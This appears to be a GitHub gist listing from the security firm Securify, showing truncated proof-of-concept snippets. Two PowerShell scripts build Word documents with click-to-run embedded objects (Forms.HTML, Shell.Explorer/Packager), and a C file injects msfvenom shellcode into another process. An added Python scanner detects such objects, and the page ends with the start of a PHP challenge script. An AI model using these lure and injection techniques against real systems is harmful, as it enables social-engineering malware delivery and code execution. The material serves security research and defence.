Securify securifybv
@securifybv
securifybv / Forms.HTML.ps1
Last active September 10, 2021 09:48
PowerShell script that creates a Word document with an embedded Forms.HTML:Image.1 object; clicking the object launches Calculator (calc.exe). See also: https://securify.nl/blog/SFY20180801/click-me-if-you-can_-office-social-engineering-with-embedded-objects.html
# target file path
$filename = [Environment]::GetFolderPath('Desktop') + '\Forms.HTML.docx'
$progid = 'Forms.HTML:Image.1'
$clsid = '5512D112-5CC6-11CF-8D67-00AA00BDCE1D'
$html = '<x type="image" src="https://securify.nl/blog/SFY20180801/packager.emf" action="file:///c|/windows/system32/calc.exe">'
# load assemblies for changing the docx (zip) file
[void] [Reflection.Assembly]::LoadWithPartialName('System.IO.Compression.FileSystem')
[void] [Reflection.Assembly]::LoadWithPartialName('System.IO.Compression')
@securifybv
securifybv / Shell.Explorer open file.ps1
Last active April 8, 2023 06:46
PowerShell script that creates a Word document containing an embedded Internet Explorer (Shell.Explorer) object. It uses Packager to create an object that looks like an embedded file; clicking the object triggers a file download. See also: https://securify.nl/blog/SFY20180801/click-me-if-you-can_-office-social-engineering-with-embedded-objects.html
# target file path
$filename = [Environment]::GetFolderPath('Desktop') + '\WebBrowser.docx'
# path to open
#$path = 'c:\windows\system32\calc.exe'
$path = 'https://securify.nl/blog/SFY20180801/thisisfine.url'
# the temp file is used for creating the icon
$tmpfile = "$env:TEMP\Totally Safe.txt"
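The two gists above both plant a click-to-run object (a Forms.HTML control, a Shell.Explorer/Packager object) inside the OOXML package. The defensive counterpart is a triage script that opens the .docx as a zip, lists every OLE ProgID and ActiveX CLSID it declares, and pulls URL-like and file: strings out of the binary object parts. The following is an added example written for this page in Python, not code from the gists or from Securify. It assumes a constructed sample document that mimics only the parts the scanner reads (word/document.xml, word/activeX/*); in the sample, the control's HTML is stored as UTF-16LE text inside activeX1.bin, which is a stand-in for the real persisted control stream, and the CLSID checked is the one the Forms.HTML gist sets.

```python
"""Triage a .docx for click-to-run embedded objects (Forms.HTML controls,
Shell.Explorer, Packager). Added example for this page, not the gists' code."""
import io
import re
import zipfile

# OLE/ActiveX classes the gists above embed; any of them in a document that
# should contain only text is worth a second look.
SUSPECT_PROGID_PREFIXES = ("Forms.HTML:", "Shell.Explorer", "Package")
# CLSID the Forms.HTML gist uses for Forms.HTML:Image.1.
KNOWN_CLSIDS = {"5512D112-5CC6-11CF-8D67-00AA00BDCE1D"}

PROGID_RE = re.compile(r'ProgID="([^"]+)"')
CLSID_RE = re.compile(r'ax:classid="\{?([0-9A-Fa-f-]{36})\}?"')
# URL-like or file: strings; applied to the raw bytes and to every second
# byte so UTF-16LE strings are found too (heuristic, not a control parser).
REF_RE = re.compile(rb'(?:https?|file|ftp):[^\s"\'<>\x00]{4,}', re.IGNORECASE)


def _find_refs(blob: bytes):
    """Unique URL/file references in a binary part, ASCII or UTF-16LE."""
    found = []
    for view in (blob, blob[0::2], blob[1::2]):
        for m in REF_RE.findall(view):
            s = m.decode("ascii", "replace")
            if s not in found:
                found.append(s)
    return found


def scan_docx(data: bytes) -> dict:
    """Return ProgIDs, ActiveX CLSIDs, binary object parts, URL/file
    references and an overall 'suspicious' verdict for the docx bytes."""
    res = {"progids": [], "clsids": [], "parts": [], "references": [], "suspicious": False}
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        for name in z.namelist():
            blob = z.read(name)
            if name.endswith((".xml", ".rels")):
                text = blob.decode("utf-8", "replace")
                res["progids"] += [(name, p) for p in PROGID_RE.findall(text)]
                res["clsids"] += [(name, c.upper()) for c in CLSID_RE.findall(text)]
            # Binary object parts: OLE embeddings and persisted ActiveX data.
            if name.startswith(("word/embeddings/", "word/activeX/")) and not name.endswith(".xml"):
                res["parts"].append(name)
                res["references"] += [(name, r) for r in _find_refs(blob)]
    res["suspicious"] = (
        any(p.startswith(SUSPECT_PROGID_PREFIXES) for _, p in res["progids"])
        or any(c in KNOWN_CLSIDS for _, c in res["clsids"])
        or bool(res["references"])
    )
    return res


def build_sample_docx(progid: str, control_html: str = "") -> bytes:
    """Constructed sample (assumption): only the parts the scanner reads, not a
    document Word would open. control_html stands in for persisted control data."""
    ns = ('xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" '
          'xmlns:o="urn:schemas-microsoft-com:office:office" '
          'xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships"')
    document_xml = (
        f'<w:document {ns}><w:body><w:p><w:r><w:object>'
        f'<o:OLEObject Type="Embed" ProgID="{progid}" ShapeID="_x0000_i1025" '
        'DrawAspect="Content" ObjectID="_1" r:id="rId4"/>'
        '</w:object></w:r></w:p></w:body></w:document>'
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("[Content_Types].xml", "<Types/>")
        z.writestr("word/document.xml", document_xml)
        if control_html:
            z.writestr("word/activeX/activeX1.xml",
                       '<ax:ocx xmlns:ax="http://schemas.microsoft.com/office/2006/activeX" '
                       'ax:classid="{5512D112-5CC6-11CF-8D67-00AA00BDCE1D}" '
                       'ax:persistence="persistStreamInit"/>')
            # Assumption: short binary header followed by the HTML as UTF-16LE.
            z.writestr("word/activeX/activeX1.bin",
                       b"\x00" * 16 + control_html.encode("utf-16-le"))
    return buf.getvalue()


if __name__ == "__main__":
    lure = build_sample_docx(
        "Forms.HTML:Image.1",
        '<x type="image" src="https://example.invalid/packager.emf" '
        'action="file:///c|/windows/system32/calc.exe">')
    for key, val in scan_docx(lure).items():
        print(key, val)
```

Run it against a real document with `scan_docx(open(path, "rb").read())`. The reference search is deliberately a string heuristic: it catches the file: and https: targets the lures above rely on, but a proper parser for the persisted control stream (or a tool such as oletools) is needed to read the control's properties reliably.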
@securifybv
securifybv / NotCreateRemoteThread.c
Last active September 20, 2021 20:22
Run shellcode in another process without CreateRemoteThread
#pragma comment(lib, "Shell32.lib")
#include <windows.h>
#include <shlobj.h>
// msfvenom -p windows/exec -a x86 --platform windows -f c cmd=calc.exe
int buf_len = 193;
unsigned char buf[] =
"\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50\x30"
"\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff"
"\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf2\x52"
<?php
/*
This badass hidden server admin created a tool to quickly get and wipe
his bitcoin keys in case of a raid. It's super secure: it has a secret key,
a brute-force lockout mechanism, and even uses signatures.
*/
session_start();
// Make sure all variables are of proper format
foreach (['key','call','signature','iv'] as $key)